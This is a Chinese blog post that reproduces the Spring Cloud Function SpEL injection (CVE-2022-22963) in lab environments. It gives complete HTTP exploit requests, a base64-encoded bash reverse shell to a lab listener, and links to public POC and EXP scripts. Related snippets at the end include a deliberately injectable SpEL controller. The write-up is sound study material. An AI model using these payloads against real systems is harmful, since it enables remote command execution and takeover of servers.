【Spring Cloud Function SPEL表达式注入漏洞复现】

已于 2022-05-03 13:04:12 修改
阅读量3.4k 收藏 2
点赞数
文章标签: 安全 web安全
于 2022-04-20 20:59:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhwfa/article/details/124307153
版权

漏洞编号:CVE-2022-22963

一、漏洞简述

Spring Cloud Function 是基于Spring Boot的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。

在版本3.0.0到当前最新版本3.2.2(commit dc5128b),默认配置下,都存在Spring Cloud Function SpEL表达式注入漏洞。

二、漏洞环境搭建

1、漏洞环境搭建

  1. cd vulhub-master/spring/CVE-2022-22963
  2. docker-compose up -d
  3. 访问:172.16.7.110:8080,出现以下界面,漏洞环境搭建成功。

2、漏洞复现

burpsuite抓包,修改请求包:

  1. 将请求方式改为post,修改请求地址。
  2. 添加Content-Type: text/plain
  3. 添加命令执行payload:spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("执行的命令")

POST /functionRouter HTTP/1.1 
Host: 172.16.7.110:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success") 
Content-Type: text/plain 
Upgrade-Insecure-Requests: 1
Content-Length: 8

test

进入docker容器,发现ssuccess文件创建成功。

3、反弹shell

  1. 命令准备:
反弹shell命令:
bash -i >& /dev/tcp/172.16.7.105/8899 0>&1bash -i >& 
base64加密:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNy4xMDUvODg5OSAwPiYx}|{base64,-d}|{bash,-i}
  1. 修改数据包后,发送数据包:

POST /functionRouter HTTP/1.1 
Host: 172.16.7.110:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNy4xMDUvODg5OSAwPiYx}|{base64,-d}|{bash,-i}") 
Content-Type: text/plain 
Upgrade-Insecure-Requests: 1
Content-Length: 4

test
  1. kali监听端口成功反弹到shell

4、利用vulfocus在线靶场进行复现

因为操作都是一样的,所有这里正好试了一下网上的POCEXP

  1. 环境搭建,利用vulfocus在线靶场,启动漏洞环境,访问:

  1. POC和EXP下载:
https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE
  1. 漏洞检测:python Spel_RCE_POC.py url.txt

  1. 反弹shell:python Spel_RCE_Bash_EXP.py url lhost lport

反弹到root shell

Kzzbrahe
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
Spring Cloud Function Spel表达式注入漏洞分析
si1ence的博客
04-14 3403
Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。主要影响的版本包括 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
Spring Cloud Function SpEL远程命令执行漏洞分析与修复
信息安全-企业安全-数据安全
04-03 4649
Spring Cloud Function SpEL远程命令执行漏洞分析与修复
Spring Cloud Function SpEL表达式注入漏洞复现
04-06 3937
漏洞描述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 影响版本 Spring Cloud Function SPEL表达式注入漏洞影响范围: 3 <= spring-cloud-function-context <= 3.2.
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2067
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
Spring Cloud Function SpEL 表达式命令注入漏洞复现及利用
Tauil的博客
07-26 893
在源码中可以看到,未修改前的代码中spring.cloud.function.routing-expression参数被functionFromExpression接口中的getValue进行处理,该方法使用了StandardEvaluationContext来进行解析SeEL表达式,从而形成了注入漏洞。时,会触发RoutingFunction逻辑,在SpringCloudFunction中,RoutingFunction类的apply方法会将请求头中的。另启一个终端,再终端中输入。...
Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)
chaojixiaojingang
04-06 7535
1.漏洞描述 SpringCloudFunctionSpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 2.影响版本 Spring Cloud Function 3.0.0 <...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹...
Spring spel表达式使用方法示例
08-29
主要介绍了Spring spel表达式使用方法示例,通过一些实例向大家展示了spel表达式的用法,需要的朋友可以了解下。
Spring Cloud Function Spel表达式注入
weixin_45794666的博客
04-05 5936
Spring Cloud Function Spel表达式注入 漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),支持基于SpEL的函数式动态路由。在特定配置下,3 <= 版本 <= 3.2.2( commit dc5128b 之前)存在SpEL表达式执行导致的RCE。 环境搭建 在IDEA中选择新建项目,然后选择Spring Initializr,输入随机项目名称,然后选择java版本和jdk版本后点击下一步。 选择Spring
SpringCloudFunction漏洞分析以及复现
qq_35976649的博客
03-29 2230
复现 0.源码下载和环境配置 在github上down下存在漏洞的源码:https://github.com/spring-cloud/spring-cloud-function/releases/tag/v3.2.0 在spring-cloud-function-3.2.0\spring-cloud-function-3.2.0\spring-cloud-function-samples目录下使用idea直接打开function-sample 1.使用默认配置下functionRouter路由复现 直接
9、表达式注入漏洞
feiwujiushiwo的博客
01-08 617
表达式注入漏洞类似远程代码执行漏洞(原理上),但远程代码执行漏洞是直接注入代码原生语句,而表达式注入漏洞是基于代码之上构建的执行逻辑。一定意义上,表达式是代码的浓缩,同时也具备像代码一样可被执行的属性。SpEL表达式(Spring)OGNL表达式(Struts2、Confluence)EL是为了让让JSP写起来更加简单,提供了在JSP中简化表达式的方法。获取数据执行运算获取Web开发常用队形调用Java方法。
java el表达式实现计算器,由浅入深SpEL表达式注入漏洞
weixin_42511255的博客
03-13 906
SpEL介绍认识SpELSpring Expression Language(简称SpEL)是一种强大的表达式语言,支持在运行时查询和操作对象图。语言语法类似于Unified EL,但提供了额外的功能,特别是方法调用和基本的字符串模板功能。同时因为SpEL是以API接口的形式创建的,所以允许将其集成到其他应用程序和框架中。Spring框架的核心功能之一就是通过依赖注入的方式来管理Bean之间的依赖...
【Nday】Spring-Cloud-SpEL-RCE漏洞复现
wwang135的博客
03-30 4394
Spring-Cloud-SpEL-RCE漏洞复现
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpELSpring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值